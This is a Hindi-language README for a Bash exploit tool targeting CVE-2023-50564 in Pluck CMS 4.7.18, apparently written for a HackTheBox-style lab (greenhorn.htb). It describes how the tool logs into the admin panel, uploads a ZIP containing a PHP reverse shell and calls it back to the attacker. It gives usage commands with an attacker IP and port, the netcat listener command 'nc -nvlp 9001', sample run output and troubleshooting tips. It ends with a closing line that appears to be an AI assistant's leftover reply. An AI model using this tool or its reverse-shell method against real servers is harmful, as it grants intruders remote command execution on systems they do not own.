
Pluck CMS 4.7.18 में दुर्भावनापूर्ण ZIP अपलोड के माध्यम से प्रमाणित दूरस्थ कोड निष्पादन को स्वचालित करने वाला Bash शोषण, CVE-2023-50564 के लिए PHP रिवर्स शेल ट्रिगर करता है।
यह स्क्रिप्ट Pluck CMS v4.7.18 में एक रिमोट कोड एक्सीक्यूशन (RCE) कमजोरी का शोषण करती है। यह कमजोरी एक दुर्भावनापूर्ण उपयोगकर्ता को सर्वर पर एक दुर्भावनापूर्ण PHP फ़ाइल अपलोड करने और उसे निष्पादित करने की अनुमति देती है, जिससे लक्ष्य मशीन पर रिमोट कमांड निष्पादन प्राप्त होता है।
स्क्रिप्ट पूरी प्रक्रिया को निम्नलिखित तरीके से स्वचालित करती है:
नोट: स्क्रिप्ट को रिवर्स शेल प्राप्त करने के लिए हमलावर की मशीन पर Netcat लिसनर की आवश्यकता होती है।
स्क्रिप्ट चलाने से पहले, निम्नलिखित सुनिश्चित करें:
./CVE-2023-50564 -h <host> -P <password> -i <IP> -p <port>
-h <host>: लक्ष्य होस्ट (जैसे, greenhorn.htb)।-P <password>: Pluck CMS एडमिन पैनल का पासवर्ड (जैसे, abcd123)।-i <IP>: रिवर्स शेल प्राप्त करने के लिए हमलावर का IP पता।-p <port>: वह पोर्ट जिस पर Netcat लिसनर रिवर्स शेल को कैप्चर करने के लिए चल रहा है।./CVE-2023-50564 -h greenhorn.htb -P ********* -i 10.10.16.7 -p 9001
Netcat लिसनर सेट करें: हमलावर की मशीन पर, निर्दिष्ट पोर्ट पर Netcat लिसनर शुरू करें:
nc -nvlp <port>
उदाहरण के लिए:
nc -nvlp 9001
स्क्रिप्ट चलाएं: स्क्रिप्ट को आवश्यक पैरामीटर प्रदान करें, जिनमें होस्ट, पासवर्ड, IP पता और पोर्ट शामिल हैं।
./CVE-2023-50564 -h greenhorn.htb -P ********* -i 10.10.16.7 -p 9001
स्क्रिप्ट निष्पादन:
love.php) होती है।"RCE is waiting for you, please go take a look.", और स्क्रिप्ट लिए गए समय को ट्रैक करने के बाद समाप्त हो जाएगी।लक्ष्य तक पहुंचें: एक बार रिवर्स शेल सक्रिय हो जाने पर, आपके Netcat लिसनर में कनेक्शन दिखाई देगा, जिससे आपको लक्ष्य मशीन पर रिमोट एक्सेस मिल जाएगा।
image
./CVE-2023-50564 -h greenhorn.htb -P ********* -i 10.10.16.7 -p 9001
Netcat listener detected on port 9001.
Downloading reverse shell PHP exploit...
updating: love.php (deflated 60%)
Exploit zipped as loverce.zip and original PHP file removed.
Extracted Cookie: PHPSESSID=somecookievalue
Login successful!
ZIP file uploaded successfully.
RCE is waiting for you, please go take a look.
Script terminated. Total time taken: 70 seconds.
यदि वे स्थापित नहीं हैं तो आप निम्नलिखित कमांड का उपयोग करके curl और netcat स्थापित कर सकते हैं:
sudo apt update
sudo apt install curl netcat
sudo yum install curl nc
यह स्क्रिप्ट केवल शैक्षिक और अधिकृत पेनिट्रेशन परीक्षण उद्देश्यों के लिए है। इस स्क्रिप्ट का अनधिकृत उपयोग अवैध और अनैतिक है। किसी सिस्टम पर किसी भी कमजोरी का शोषण करने से पहले हमेशा उचित प्राधिकरण प्राप्त करें।
504 Gateway Time-out: स्क्रिप्ट को रिवर्स शेल निष्पादित करने का प्रयास करते समय यह त्रुटि हो सकती है, लेकिन इससे शेल निष्पादन की सफलता पर कोई प्रभाव नहीं पड़ता है। त्रुटि आमतौर पर लक्ष्य सर्वर द्वारा HTTP अनुरोध का जवाब देने में अधिक समय लेने के कारण होती है, लेकिन शेल फिर भी काम करना चाहिए।
Netcat लिसनर समस्याएं: यदि आपको रिवर्स शेल प्राप्त नहीं होता है, तो सुनिश्चित करें कि आपका IP पता और पोर्ट सही ढंग से सेट हैं, और कोई फ़ायरवॉल प्रतिबंध नहीं है जो लक्ष्य को आपकी मशीन से वापस कनेक्ट होने से रोक रहा हो।
स्क्रिप्ट लॉगिन में विफल: यदि CMS एडमिन पैनल में लॉगिन विफल होता है, तो प्रदान किए गए पासवर्ड को सत्यापित करें और सुनिश्चित करें कि CMS लक्ष्य मशीन पर सुलभ है।
यदि आप README में कोई और अनुकूलन या स्पष्टीकरण चाहते हैं तो कृपया मुझे बताएं!